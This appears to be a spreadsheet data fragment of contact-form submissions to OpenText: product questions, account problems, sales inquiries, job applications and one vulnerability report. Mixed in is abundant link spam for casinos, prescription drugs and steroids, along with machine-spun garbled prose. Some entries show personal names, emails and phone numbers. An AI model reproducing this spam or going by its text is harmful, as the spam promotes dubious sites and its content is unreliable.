    <t>live casino france _x000D_
[url=http://casino2018money.com/]slots inferno no deposit bonus 2017[/url] _x000D_
&lt;a href="http://casino2018money.com/"&gt;online casino software developers&lt;/a&gt; _x000D_
the best online casino games _x000D_
[url=http://casino-online.us.com/]online slot websites[/url] _x000D_
&lt;a href="http://casino-online.us.com/"&gt;free slots online 888 wsm&lt;/a&gt; _x000D_
gambling addiction belfast _x000D_
[url=http://real777money.com/]online slots american express[/url] _x000D_
&lt;a href="http://real777money.com/"&gt;online casino zdarma&lt;/a&gt; _x000D_
online roulette for real money paypal _x000D_
[url=http://casinoveganonline.com/]can you gamble online for real money[/url] _x000D_
&lt;a href="http://casinoveganonline.com/"&gt;racing free bets&lt;/a&gt; _x000D_
no deposit bonus slots uk _x000D_
[url=http://casino24list.com/]online casino vegas slots free play[/url] _x000D_
&lt;a href="http://casino24list.com/"&gt;free online slots 3 reel&lt;/a&gt; _x000D_
online casino 18 years old</t>
  </si>
  <si>
    <t xml:space="preserve">Продаем матрасы Собственное производство _x000D_
Матрас РВ цв         460-1300 руб _x000D_
Матрас детский РВ    400 руб _x000D_
Подушка РВ           160 руб _x000D_
Подушка синтепон     155 руб _x000D_
Внимание Новинка! Предлагаем спальные комплекты для рабочих: матрас 70х190 п/э + одеяло 1сп. + КПБ п/э 1сп. + подушка 60х60. _x000D_
Цена 1500 руб!!! _x000D_
 _x000D_
seojerry@mail.ru </t>
  </si>
  <si>
    <t>no deposit bonus eurogrand _x000D_
[url=http://casino2018money.com/]live casino bonus[/url] _x000D_
&lt;a href="http://casino2018money.com/"&gt;free bets money saving expert&lt;/a&gt; _x000D_
roulette online chat _x000D_
[url=http://casino-online.us.com/]free online casino games nz[/url] _x000D_
&lt;a href="http://casino-online.us.com/"&gt;online roulette australia real money&lt;/a&gt; _x000D_
all slots _x000D_
[url=http://real777money.com/]online slots australia real money[/url] _x000D_
&lt;a href="http://real777money.com/"&gt;online casino free slots 3d&lt;/a&gt; _x000D_
casino zollverein _x000D_
[url=http://casinoveganonline.com/]demo roulette online[/url] _x000D_
&lt;a href="http://casinoveganonline.com/"&gt;online roulette voor geld&lt;/a&gt; _x000D_
casino xmas party _x000D_
[url=http://casino24list.com/]online casino exploit[/url] _x000D_
&lt;a href="http://casino24list.com/"&gt;online roulette wheel simulator&lt;/a&gt; _x000D_
online casinos that give you free money</t>
  </si>
  <si>
    <t>online casino free spins usa _x000D_
[url=http://casino2018money.com/]online casino zdarma automaty[/url] _x000D_
&lt;a href="http://casino2018money.com/"&gt;slot machines edmonton&lt;/a&gt; _x000D_
low stakes online roulette _x000D_
[url=http://casino-online.us.com/]888 poker bonus code no deposit[/url] _x000D_
&lt;a href="http://casino-online.us.com/"&gt;99 slots no deposit bonus codes 2015&lt;/a&gt; _x000D_
online roulette flash game _x000D_
[url=http://real777money.com/]online casino games 888[/url] _x000D_
&lt;a href="http://real777money.com/"&gt;online casino legal in texas&lt;/a&gt; _x000D_
online casino georgia _x000D_
[url=http://casinoveganonline.com/]texas holdem no deposit bonus[/url] _x000D_
&lt;a href="http://casinoveganonline.com/"&gt;free bets 4&lt;/a&gt; _x000D_
york casino _x000D_
[url=http://casino24list.com/]bingo slots online[/url] _x000D_
&lt;a href="http://casino24list.com/"&gt;5 free casino&lt;/a&gt; _x000D_
online roulette singapore</t>
  </si>
  <si>
    <t xml:space="preserve">недорогие международные грузоперевозки Новосибирск_x000D_
недорогие международные грузоперевозки Красноярск_x000D_
грузоперевозки Новосибирск отзывы_x000D_
грузоперевозки Новосибирск_x000D_
недорогие грузоперевозки Омск_x000D_
грузоперевозки Красноярск отзывы_x000D_
недорогие международные грузоперевозки Россия Казахстан отзывы_x000D_
международные грузоперевозки Тюмень отзывы_x000D_
недорогие международные грузоперевозки Челябинск_x000D_
недорогие грузоперевозки Новосибирск_x000D_
 _x000D_
[URL="https://mityr-trans.com"]международные грузоперевозки Омск[/URL] _x000D_
международные грузоперевозки Тюмень_x000D_
недорогие грузоперевозки Тюмень отзывы_x000D_
грузоперевозки Россия Казахстан_x000D_
грузоперевозки РФ РБ_x000D_
грузоперевозки РФ РБ отзывы_x000D_
грузоперевозки Пермь_x000D_
недорогие международные грузоперевозки Тюмень_x000D_
международные грузоперевозки Тюмень отзывы_x000D_
недорогие грузоперевозки Россия Беларусь отзывы_x000D_
грузоперевозки Россия Казахстан отзывы_x000D_
</t>
  </si>
  <si>
    <t>online casino logo _x000D_
[url=http://casino2018money.com/]online casino forum[/url] _x000D_
&lt;a href="http://casino2018money.com/"&gt;best online casino games real money&lt;/a&gt; _x000D_
forex no deposit bonus 50 _x000D_
[url=http://casino-online.us.com/]no deposit bonus no wagering[/url] _x000D_
&lt;a href="http://casino-online.us.com/"&gt;top online casino 2014&lt;/a&gt; _x000D_
online casino jackpot winners _x000D_
[url=http://real777money.com/]online casino 30 free spins[/url] _x000D_
&lt;a href="http://real777money.com/"&gt;online slot sites&lt;/a&gt; _x000D_
online roulette united states _x000D_
[url=http://casinoveganonline.com/]online slots 1250[/url] _x000D_
&lt;a href="http://casinoveganonline.com/"&gt;online casino exposed&lt;/a&gt; _x000D_
online casino 3 reel slots _x000D_
[url=http://casino24list.com/]online roulette forums[/url] _x000D_
&lt;a href="http://casino24list.com/"&gt;online casino dealer job description&lt;/a&gt; _x000D_
play game slots online</t>
  </si>
  <si>
    <t>I need to update the content for Supai Infotech India Private Limited in the Partner Directory.</t>
  </si>
  <si>
    <t xml:space="preserve">купить зелбораф в москве _x000D_
 _x000D_
[url=http://pharma-24.ru/]имбрувика цена в рублях[/url]_x000D_
[url=http://pharma-24.ru/]revlimid ревлимид леналидомид lenalidomide[/url]_x000D_
 _x000D_
&lt;a href=http://pharma-24.ru/&gt;капрелса&lt;/a&gt;_x000D_
&lt;a href=http://pharma-24.ru/&gt;тарцева 150 мг 25мг 100 мг&lt;/a&gt;_x000D_
</t>
  </si>
  <si>
    <t>bovada _x000D_
[url=http://casino2018money.com/]play gambling online[/url] _x000D_
&lt;a href="http://casino2018money.com/"&gt;virtual gambling games&lt;/a&gt; _x000D_
casino x no deposit bonus _x000D_
[url=http://casino-online.us.com/]casino hospital[/url] _x000D_
&lt;a href="http://casino-online.us.com/"&gt;casino bonus on paddy power&lt;/a&gt; _x000D_
online casino ohio _x000D_
[url=http://real777money.com/]online casino 120 free spins united states[/url] _x000D_
&lt;a href="http://real777money.com/"&gt;royal vegas&lt;/a&gt; _x000D_
casino victoria _x000D_
[url=http://casinoveganonline.com/]slot joint[/url] _x000D_
&lt;a href="http://casinoveganonline.com/"&gt;best online slot sites&lt;/a&gt; _x000D_
legal online usa casinos _x000D_
[url=http://casino24list.com/]fruit machine licence cost[/url] _x000D_
&lt;a href="http://casino24list.com/"&gt;online roulette casino australia&lt;/a&gt; _x000D_
all microgaming slots</t>
  </si>
  <si>
    <t>There are different ways to fry tomatoes, but each of them will require cook to spend row hours in the kitchen, so this dish is usually better correct  do on weekends or for special occasions. When tomatoes are roasted, they get a deep taste and are combined with seafood, antipasto and other roasted vegetables. Moreover, they are good suitable for use in the baking industry, in making bread or cake with custard. _x000D_
[url=http://stewedtomatoes.top/homemade-stewed-tomatoes-recipe]http://stewedtomatoes.top/homemade-stewed-tomatoes-recipe[/url]</t>
  </si>
  <si>
    <t>Looking at optimization platforms for a client.</t>
  </si>
  <si>
    <t>There are different ways to fry tomatoes, but each of them will require the hostess to spend row hours in the kitchen, so this dish is usually better correct  prepare on weekends or for special occasions. When tomatoes are roasted, they get a deep taste and are combined with seafood, antipasto and other roasted vegetables. Moreover, they are perfectly suitable for use in the baking industry, in making bread or cake with custard. _x000D_
[url=http://stewedtomatoes.top/canned-stewed-tomatoes-recipe-delicious-simplicity]http://stewedtomatoes.top/canned-stewed-tomatoes-recipe-delicious-simplicity[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.fitkid.rs/images/temp/site.php?as=427-igtropin-igf-1-lr3-buy-jintropin-online-from-china-buy-jintropin-with-credit-card.html]igtropin igf-1 lr3[/url]_x000D_
 Make sure you not set standard lotions in your encounter, particularly those that are fragrant. Products that happen to be made for hands and wrists or other components of your body might make your facial skin oily, aggravate your epidermis, and cause acne. As an alternative, use a cream that may be created just for your face._x000D_
  [url=http://www.dev.lincolnsquare.co.uk/wp-content/zare.php?n=1420-Testosterone-Sale-Canada,Oxandrolone-For-Sale,Oxymetholone-Dosage.html]Testosterone Sale Canada[/url]_x000D_
 Brush your tooth with cooking soda pop every single day. This is a excellent and normal treatment that may be effective and inexpensive. Preparing soft drink is really a normal rough that is known to take away stains through your pearly whites without damaging them. You need to remember to brush your tooth gently to avoid bothersome your gums._x000D_
  [url=http://www.mclain.co.uk/fonts/form.php?wiss=151]Generique Cialis[/url]_x000D_
 Often be clear in relation to your identiity. The people who have subscribed in your subscriber list must identify you as the person associated with the organization that may be giving them emails. If you deliver email messages that range from general "admin" at your business, they will in all probability not be read._x000D_
  [url=http://www.dmgroupkararwala.com/blog/list.php?pdd=310]Canada Testosterone Supplements[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.consultelhotelaria.com.br/img/cache.php?marin=58]Australia Testosterone Supplements[/url]_x000D_
 When it comes to portable marketing and advertising, the first and most important things you need to consider is your articles should be the two warm and friendly, fascinating, and acquainted for your focuses on. If this suggestion strikes home along, keep reading this article and you may be pleased you spent the time._x000D_
  [url=http://www.snehkutirseniorcitizenshome.org/userFiles/content.php?Of=1066-Nandrolone-Decanoate-Canada-Buy-Dianabol-10mg-Nandrolone-Decanoate-Buy-Uk/]Nandrolone Decanoate Canada[/url]_x000D_
 While you are submitting video tutorials online like YouTube, you are allowed to write in the online video explanation. You must have your web site in this particular movie outline to ensure customers can authenticate that the online video came from you and in addition they look to your website for more information._x000D_
  [url=http://www.ccbabogados.com/informativo/text.php?button=Cialis-20-Mg-Duration-Kamagra-Oral-Jelly-Review-Levitra-20-5/]Cialis 20 Mg Duration[/url]_x000D_
 A great idea for Fx trading is to make sure that the agent you select is fine with day investing. It's no magic formula that many broker agents don't like day investing. Should your agent notices that you've made money time investing, they could make a plan to close your money._x000D_
  [url=http://www.vinhemfashion.com/account/list.php?a=441-Viagra-In-Australia,Buy-Viagra-Perth-Wa,Viagra-100mg-Tablets-4]Viagra In Australia[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.roummah.org/Symbol/power.php?id=444-Buy-Viagra-Hamburg,Kamagra-Apotheke-Schweiz,Viagra-Rezeptfrei-Berlin]Buy Viagra Hamburg[/url]_x000D_
 Search engine marketing is the way to go for making certain your internet site receives acquired by Google, Google and Bing. It takes not just sprinkling in search phrases however, as Search engine marketing is each a research and art form. Read on this informative article to understand some suggestions that will help you perfect your Search engine marketing process._x000D_
  [url=http://www.yourlifeinspired.org/wp-content/life.php?heat=613-Methandienone-10mg-Cycle-Oxandrolone-Uk-Testosterone-Isocaproate-Uses.html]Methandienone 10mg Cycle[/url]_x000D_
 Save your valuable outdated outfits. Styles and clothing go in cycles, so whatever you are sporting now will probably use a return in a decade or maybe more. Even unless you consider you will possibly wear it again then, you could possibly can replace garments with an individual searching for anything vintage._x000D_
  [url=http://www.watergatesconstruction.co.uk/class/assets.php?a=88]Cialis Online Europa[/url]_x000D_
 If you wish your iPhone to continue working correctly, it is very important never ever let it rest within your auto for a brief amount of time. In a car, very hot conditions are magnified as a result of garden greenhouse outcome. Higher temperature ranges can harm your iPhone. Subjecting your product to cold temperatures is equally harmful to the phone's parts._x000D_
  [url=http://www.minimax-soft.com/css/list.php?a=250-Brand-Levitra-Online,Brand-Cialis-Online,Viagra-Female]Brand Levitra Online[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I cannot log into my Hightail account. This email will serve as my cancellation of my Hightail, formerly You Send it, now OpenText account. </t>
  </si>
  <si>
    <t>Dears;_x000D_
NourNet have many services as below;_x000D_
1.	ISP Services( Internet , MPLS (IP-VPN)), Global MPLS,_x000D_
2.	Videoconference._x000D_
3.	Height Availability Disaster Recovery Service (DR)_x000D_
4.	Cloud services._x000D_
5.	Managed IT Services._x000D_
6.	Collocation, Hosting._x000D_
7.	Domain name, email accounts._x000D_
8.	Microsoft Office 365, we are partner with Microsoft._x000D_
9.	Outsource IT._x000D_
10.	Zscaler, internet proxy Cloud._x000D_
11.	DDOS, be save from attacked._x000D_
12.	New DATA Center  ,Tier-3 certified facility, Total area: 4,500 m2, Carrier neutral facility , Capacity: 450 racks._x000D_
_x000D_
Hope to hear from you.</t>
  </si>
  <si>
    <t>My client would like to use Open Text Fax Connectors for HP MFPs</t>
  </si>
  <si>
    <t>I need to know if Opentext or Documentum can integrate directly to Microsoft dynamics or not</t>
  </si>
  <si>
    <t>I am an end-user of OpenText Brava! DWG Viewer. Now you have discontinued the product, suggesting to buy Brava! Desktop DXP. I have some queries about Brava! DXP._x000D_
(1) Can I get a trial version of Brava! DXP (not full version of Brava! Desktop), so that I can check whether it fulfills my requirement in terms of speed, compatibility, etc. before I actually buy the Brava! DXP._x000D_
(2) the single-seat license bought for Brava! DXP is transeferable to from one PC to other? OR the license once installed on a PC can not be used on other PC (eg. in case if I bought a new PC, urgraded my PC, etc.)?._x000D_
Kindly reply at the earliest...</t>
  </si>
  <si>
    <t>online slots au _x000D_
[url=http://casino2018money.com/]nordfx $8 no deposit bonus[/url] _x000D_
&lt;a href="http://casino2018money.com/"&gt;casino zug&lt;/a&gt; _x000D_
online cash casino games _x000D_
[url=http://casinoboomonline.com]casino bonus bez depozita[/url] _x000D_
&lt;a href="http://casinoboomonline.com"&gt;online roulette tips strategies&lt;/a&gt; _x000D_
online roulette using paypal</t>
  </si>
  <si>
    <t>Our account is locked</t>
  </si>
  <si>
    <t>online casino sites usa _x000D_
[url=http://casino2018money.com/]new online slots 2016[/url] _x000D_
&lt;a href="http://casino2018money.com/"&gt;australian online casino free spins&lt;/a&gt; _x000D_
online casino sites usa _x000D_
[url=http://casinoboomonline.com]online casino 2017[/url] _x000D_
&lt;a href="http://casinoboomonline.com"&gt;casino kursaal&lt;/a&gt; _x000D_
online gambling win real money</t>
  </si>
  <si>
    <t>I originally sent my files by USEND IT - that became HIGHTAIL now I am forwarded to OPENTEXT and there is NO way of sending files!  I have a subscription paid for to HIGHTAIL - what is going on please.  How can I send my audio files?  There is no way?  PLEASE HELP it is URGENT !  sincerely Carol Bolt</t>
  </si>
  <si>
    <t>I am interested in applying for your available Account Development position in Richmond Hill.  I currently reside and work in Seattle, but am considering relocating to Toronto to be closer to my aging parents.  My current position is as an Enterprise Account Development Representative with 4 years experience.</t>
  </si>
  <si>
    <t>hi</t>
  </si>
  <si>
    <t>I need to retrieve my previous licencing for my copy of Brava Desktop. I have just started to use a new PC and don't have a copy of the details I require._x000D_
_x000D_
Thank you in advance.</t>
  </si>
  <si>
    <t>internet casino games real money _x000D_
[url=http://casino2018money.com]jackpot casino australia[/url] _x000D_
&lt;a href="http://casino2018money.com"&gt;fruit machine noise&lt;/a&gt; _x000D_
no deposit bonus today _x000D_
[url=http://casinoboomonline.com]fruit machine keys ebay[/url] _x000D_
&lt;a href="http://casinoboomonline.com"&gt;live casino canada&lt;/a&gt; _x000D_
no deposit bonus malaysia</t>
  </si>
  <si>
    <t>We are looking in to purchase 10 licenses of Brava reader (Image Only Module) can please describe what is the difference between TX &amp; TXL versions. Awaiting your response</t>
  </si>
  <si>
    <t xml:space="preserve">constructing houses in the area with Earthquakes in okazaki, japan_x000D_
_x000D_
okazaki, japan is not an unfamiliar person at earthquakes. For a compact country, you need to a big dealing with._x000D_
_x000D_
Keiji Doi_x000D_
_x000D_
japan can be found inside four tecttoy platesic, goodness me collide some other below the japanese [url=https://www.crunchbase.com/organization/asiame]asiame review[/url] is arc, guarantee that oh we have noticed so many lot of earthquakes. communities will be compressed, occupants bound under the rubble. this young lady affirms, "it has no caution, Just a bad resonance considering that quake arranged, japan Meteorological firm will be your hub along with earthquake following. actually, right after i got here, a new earthquake minted. the soil in a literal sense shook following my eyes. and i was in just [url=https://www.pinterest.com/asiame1/]asiame.com[/url] the right place to learn more._x000D_
_x000D_
medical professional Kenji Maeda_x000D_
_x000D_
our planetquake taken place at the detail akin to 80 km's less than, So size is always 4.5._x000D_
_x000D_
often the train locomotives are safe utilizing a seismic early cautionary device. shock combined with shake in your yard are already recognized [url=http://www.stumbleupon.com/stumbler/Asiame]asiame.com[/url] while accelerometers. particular are put on the train create a record of whilst others east coast on the ture of Honshu. all the locomotives handle as many as 150 million anyone in the car annually, people can easily trek inside transfers that could reach over 400 kilometres hourly. this asia should find out tolerate them. shoppers there has been a popular financial in adorning tremble repellent constructs. but there is one type of building that will have stood the ages._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Interview </t>
  </si>
  <si>
    <t>I can enter this homepage from PC web, but I can't enter mobile app._x000D_
Of course , I try by same account and password._x000D_
Would you tell me the way to enter?</t>
  </si>
  <si>
    <t>best online casinos &lt;a href="https://online-casinoss.us.org/"&gt;slots for real money&lt;/a&gt; best online casino | [url=https://online-casinoss.us.org/]mgm online casino[/url]</t>
  </si>
  <si>
    <t>online casino mac os x _x000D_
[url=http://casino2018money.com/]online casino games for real money in india[/url] _x000D_
&lt;a href="http://casino2018money.com/"&gt;online casino make real money&lt;/a&gt; _x000D_
no deposit bonus william hill casino _x000D_
[url=http://casinoboomonline.com]no deposit bonus low wagering requirements[/url] _x000D_
&lt;a href="http://casinoboomonline.com"&gt;play for real money online&lt;/a&gt; _x000D_
casino bonus on paddy power</t>
  </si>
  <si>
    <t>online casinos &lt;a href="https://online-casinoss.us.org/"&gt;slots for real money&lt;/a&gt; real money casino | [url=https://online-casinoss.us.org/]mgm online casino[/url]</t>
  </si>
  <si>
    <t>WebPT has acquired a company that is currently using AppXtender/Documentum on-premise using VM's. _x000D_
_x000D_
Our goal is top identify which solutions Opentext can offer in the sense migrating off premise to cloud whether it be that opentext hosts it and/or if we move the VM's to Azure. _x000D_
_x000D_
We have 19 remote users that currently scan through VPN to the on-premise application. We would to know more on how we can scan to your application over internet if possible_x000D_
_x000D_
Thanks - Mikel</t>
  </si>
  <si>
    <t xml:space="preserve">Updating current locations in lkremote </t>
  </si>
  <si>
    <t>online casino gambling &lt;a href="https://online-casinoss.us.org/"&gt;gsn casino games&lt;/a&gt; best online casino | [url=https://online-casinoss.us.org/]free online casino slots[/url]</t>
  </si>
  <si>
    <t>Hello,_x000D_
My name is Barbara Korycki and I work for Broadridge Financial Solutions, Inc.  I would like to speak with someone regarding your Capture and Recognition solution to request a demo. _x000D_
I'm currently working on a project that will require high-speed scanning and Imaging recognition (Omnichannel, OCR, OMR, NLP) software.  I can provide more details once a NDA is signed.  _x000D_
I look forward to hearing from you. _x000D_
Regards,_x000D_
Barbara Korycki_x000D_
Broadridge Financial Solutions, Inc._x000D_
Email: Barbara.Korycki@broadridge.com_x000D_
Phone: 631-274-2622</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
i've reported security vulnerability.but opentext not responded about it .but today i can't reproduce the issue which i founded it seems to be fixed._x000D_
Vulnerability description : SQL query disclosure in appworks,apac,opentext,com (This field not supported for URL)_x000D_
Now this page is a login page._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Muhammed Ashmil </t>
  </si>
  <si>
    <t xml:space="preserve">Applying for Sales Manager open position </t>
  </si>
  <si>
    <t>Advise your HR team that the job application doesn’t work on your careers portal because you force people to upload from Google Drive but your app has not been verified yet by google so it fails.  Consequently nobody can upload their resume.</t>
  </si>
  <si>
    <t>Postulation Sales Manager</t>
  </si>
  <si>
    <t>Looking for a Document Management System (DMS) as a standalone website or to possibly supplement an existing Drupal CMS._x000D_
_x000D_
Email contact is preferable to telephone.</t>
  </si>
  <si>
    <t>Hello_x000D_
We help many business optimization companies add more capabilities through optimizing customers IT infrastructure, we feel we could add more capabilities to your offering and we are willing to pay your company a fee for business brought in, not only can you help your customers save on IT but we will pay you for the referral. A company typically spends $60,000 in salary and another $15,000 in taxes and benefits, we can typically do the same work for less than $2,000 per month saving a company 10”s of thousands of dollars, plus we can typically optimize internet, voice, loud etc. We can take over an environment with our 24/7 helpdesk and remote capabilities and can always dispatch a tech if needed</t>
  </si>
  <si>
    <t>On-site Advance Table Training.  We would like to see the agenda, understand options to tailor training to include Advance Charts, graphics and Q&amp; A time the last day.  Would like to understand how much time is needed by OpenText to establish the training if we are looking for Late July or August training.</t>
  </si>
  <si>
    <t>We are a DTP Service provider and we were just checking how we could be one of you suppliers when it comes to any Desk Top publishing Inquiry</t>
  </si>
  <si>
    <t>free online casino slots &lt;a href="https://online-casinoss.us.org/"&gt;gsn casino slots&lt;/a&gt; best online casino | [url=https://online-casinoss.us.org/]free online casino slots[/url]</t>
  </si>
  <si>
    <t>real money casino &lt;a href="https://online-casinoss.us.org/"&gt;bovada casino&lt;/a&gt; online casino real money | [url=https://online-casinoss.us.org/]casino slots[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">We have edocs but I am trying to find a solution for our scanning needs of high volumes of documents. </t>
  </si>
  <si>
    <t>I need information regarding Fax2Mail as a fax solution. I would also like information about DoD RMF compliance.</t>
  </si>
  <si>
    <t>Could you give me information about Firtsclass Cloud</t>
  </si>
  <si>
    <t>I need access to documentation</t>
  </si>
  <si>
    <t>We are currently a customer of the Easylink Fax services, user admin name is harbert.  We have an office in London.  Are you able to service this office with international faxes, and if not w/ our current product, is there another one that will work?</t>
  </si>
  <si>
    <t>My organization is looking for an ECM system that can manage large amounts of Regulatory files. The current system being used has limitations on file size and does not build its own indexing system so indexing is an unstandardized manual process. A new or different system is needed to maintain compliance for historical reasons and build new projects with historical data.</t>
  </si>
  <si>
    <t>I am trying to sign into the support site but get this message_x000D_
_x000D_
Content Server Error: Error processing request._x000D_
[Could not get the Enterprise Workspace.]</t>
  </si>
  <si>
    <t>Angebot für AutoCAD _x000D_
Only (3x)_x000D_
Bitte ein Angebot für folgenden Kunden zusenden:_x000D_
Bauverein zu Lünenen Bau &amp; Verwaltungs GmbH_x000D_
Lange Str. 99_x000D_
44532 Lünen</t>
  </si>
  <si>
    <t>Wanted to know if opentext has on-premise solution for OCR applications and what is the accuracy.</t>
  </si>
  <si>
    <t>Hej!_x000D_
_x000D_
Jag heter Tomas Nelin och arbetar som IT-lösningsarkitekt för Läkemedelsverket._x000D_
_x000D_
Läkemedelsverket arbetar löpande med att se och förstå vad IT-marknaden gör och kan komma att göra om olika teknologier eller områden för att lära oss hur det bör påverka den IT som Läkemedelsverket använder eller bör använda._x000D_
_x000D_
Som ett led i detta vänder vi oss ibland till marknaden för att ta reda på mer. _x000D_
_x000D_
Just nu i detta sammanhang önskar vi få veta mer om hur ni, ert företag med produkter, har tänkt/planerat ta till er ny teknik som AI, ’Machine-learning’, IoT, ’LinkedData’, ’the semantic web’, Responsiva appar o.s.v._x000D_
_x000D_
Låter det intressant så tänker vi oss en period från mitten/slutet av augusti till mitten av september där möjlighet för er finns att presentera lösningar, produkter och planer._x000D_
_x000D_
Vår kontaktperson för detta är Tomas Nelin, som ni når genom e-post tomas.nelin@lakemedelsverket.se eller telefon 0709 431 460._x000D_
_x000D_
Mvh_x000D_
Tomas Nelin</t>
  </si>
  <si>
    <t>Dear Sir,_x000D_
_x000D_
i belong to the department of forensic sciences of the Bavarian police (Germany)._x000D_
_x000D_
Currently we are trying to collect information about e-discovery programs that could help us to investigate large amounts of seized digital data._x000D_
Our demand originates from all kinds of crime – not only economic crime._x000D_
_x000D_
In order to get an overview of the market and the main field of expertise of each tool i would like to kindly ask you some questions:_x000D_
_x000D_
1.    Which of your tools do you think is best for searching and evaluating large amounts of seized data originating from very heterogenous sources?_x000D_
_x000D_
2.    Is the tool capable to directly handle forensic images (expert whitness format) or has the source to be mounted?_x000D_
_x000D_
3.    Does your tool run on a single server or is it able to work on distributed environments, too (both for indexing and for searching)?_x000D_
_x000D_
4.    Is it possible to use the tool inhouse (i.e. completely offline) or does it demand external ressources?_x000D_
_x000D_
5.    Which amount of data would be a rough limit for sensible work with the tool? Can you tell us the size of the largest case the tool has managed successfully?_x000D_
_x000D_
6.    Does the tool rely on other tools for the extraction of textual data from heterogenous data sources?_x000D_
_x000D_
7.    Are there import/export-interfaces from/to tools like e.g. NUIX?_x000D_
_x000D_
8.    How much IT-knowledge is needed for researching the data base? Is there a demand for programmers? Which parts rely on external help?_x000D_
_x000D_
9.    Does the tool have an own GUI or is it based on a web frontend?_x000D_
_x000D_
10.  Does your tool support foreign languages and charsets (e.g arabic)?_x000D_
_x000D_
11.  Which is the main focus of your tool? Could you name its outstanding feature?_x000D_
_x000D_
12.  What is your pricing-model based on? Does it depend on the data size or on hardware-ressources?_x000D_
_x000D_
Thanks for your help in advance!_x000D_
_x000D_
Please do not send me newsletters or other advertisements. We will contact you again after we have a clear overview._x000D_
_x000D_
_x000D_
Kind regards_x000D_
_x000D_
Dr. Marti</t>
  </si>
  <si>
    <t>We are a reseller with a headquarter in Singapore and currently we have a client who is looking for the item below. Can you provide me the reseller cost, market list price and lead time of this item please?_x000D_
_x000D_
he fax appliance model is OPENTEXT Rightfax Express - (S-CPFA211KIT RightFax Express Analog (4 Channels) [System A] *)._x000D_
_x000D_
If you have a partner in Singapore, please let me contact me. Thank you.</t>
  </si>
  <si>
    <t>Hi, _x000D_
_x000D_
I’m trying to establish Nationwide’s licence position for TeamSite licences and I can see that a maintenance renewal was completed in January 2017 for a two-year term (PO Number 2000118375). Are you able to confirm if the licences are perpetual licences owned by Nationwide?</t>
  </si>
  <si>
    <t>Kündigung des Vertrages</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, _x000D_
_x000D_
I'm from Tactic Games IT-support, we also provide support for out subsidiaries there in UK._x000D_
It seems that we already have Trading Grid established with you via email jeremy@tacticgames.co.uk . I have few questions, _x000D_
_x000D_
1. Can you enable this account / service to be abel to receive Tesco EDI orders?_x000D_
2. Can you check that it@tactic.net account linked to that same customer is ok to administer and use that ._x000D_
_x000D_
BR,_x000D_
-- _x000D_
Atte Markula_x000D_
Tactic Games Oy_x000D_
Computer support_x000D_
Mobile: +358 (0)44 777 2000 | Email: atte.markula@tactic.net_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Всем привет, скажите пожалуйста идеже можно укупить высококачественные оригинальные луковица _x000D_
 _x000D_
</t>
  </si>
  <si>
    <t>I am currently taking a college class at Jefferson College in Hillsboro, Mo. I would like to interview someone in the information technologies field regarding their journey through college and into the jobs industry for a research assignment in that class.</t>
  </si>
  <si>
    <t>I'm interested in purchasing a copy of NFS Solo.  Will the current version (14) run on Windows XP or can I get a prior version that supports XP?</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I have to register inorder to post my queries to resolve my issues etc and access the documentation and support forums etc.</t>
  </si>
  <si>
    <t>Hello, I was checking if you had any old computers or electronics from your locations in Southern California you would like to recycle. Computer Recycling Team picks up e-waste for free when you have 15 or more qualifying items off of our qualified list which can be viewed on our website.  It is our company name dot com.</t>
  </si>
  <si>
    <t>Looking to see if Open Text can help with our Engineering Document Management processes.</t>
  </si>
  <si>
    <t>We would like to schedule a demo for OpenText and discuss pricing.</t>
  </si>
  <si>
    <t>I am looking for an enterprise grade replacement for Televox.  I would like to have a conversation to explore the OpenText Notification Platform.  Please email me to set up a time.</t>
  </si>
  <si>
    <t>I have had an account with Hightail and previous to that Yousendit for years and I recently renewed the account for a year. Now, I notice it doesn't exist anymore as it is no Opentext. I tried logging on here and it didn't recognize me. I requested a "Forgotten Password" and it didn't recognize my email. Was my account transferred to Opentext or did I just lose my money to Hightail?</t>
  </si>
  <si>
    <t>What version of RightFax does NextGen support?</t>
  </si>
  <si>
    <t>I am sure that I would be the best candidate according  to experience and my will to help Lennart G to be successfull  at Open Text...</t>
  </si>
  <si>
    <t>One of our employees eFax is not working. His fax number is 866-895-2899. His email is jratti@mitsubishiingredients.com. Whenever we try to fax him, we get a response that his number is not accepting faxes, however when I log into our set up, it says that this fax number is active. Can you please look into this?_x000D_
_x000D_
Thank you!</t>
  </si>
  <si>
    <t>Interested in OpenText Redact-It Enterprise</t>
  </si>
  <si>
    <t>We would like to demo and schedule review of your projects.  I would like to talk to an account rep to set a demo based on our current requirements.  We understand the City of Austin has a contract for some applications but our requirements exceed how that product is being used today.  So we want to see what you have that may meet our needs.</t>
  </si>
  <si>
    <t>I have a user who is unable to forward faxes via email. She is using RightFax FaxUtil, on Windows 10, and her "Send via email..." option is greyed out. Are you able to assist?</t>
  </si>
  <si>
    <t xml:space="preserve">Hello!_x000D_
_x000D_
 _x000D_
_x000D_
Our team at ClickNerd is currently looking for high quality traffic from trusted sources like yourself. We’re currently looking to integrate our XML Feed on your network to start a long-term and prosperous traffic partnership._x000D_
_x000D_
 _x000D_
_x000D_
We are looking for you to passback url or subid so we can optimize our campaigns across your traffic and continue to scale as we continue our partnership._x000D_
_x000D_
 _x000D_
_x000D_
Would you please let me know more about your traffic sources so I may provide the proper feed(s) to you? (Ex. Mainstream/Adult,Desktop/Mobile,OS,Website Traffic/Adware, Mobile, Desktop, Etc.)_x000D_
_x000D_
 _x000D_
_x000D_
 _x000D_
_x000D_
Looking forward to hearing back from you as we have big demand at this time._x000D_
_x000D_
 _x000D_
_x000D_
 _x000D_
_x000D_
 _x000D_
_x000D_
Kindest Regards_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>I am looking to set up fax through email for our new office space in Boca Raton, FL</t>
  </si>
  <si>
    <t>I would like to know some info about licence transfer._x000D_
Thanks_x000D_
Giulia</t>
  </si>
  <si>
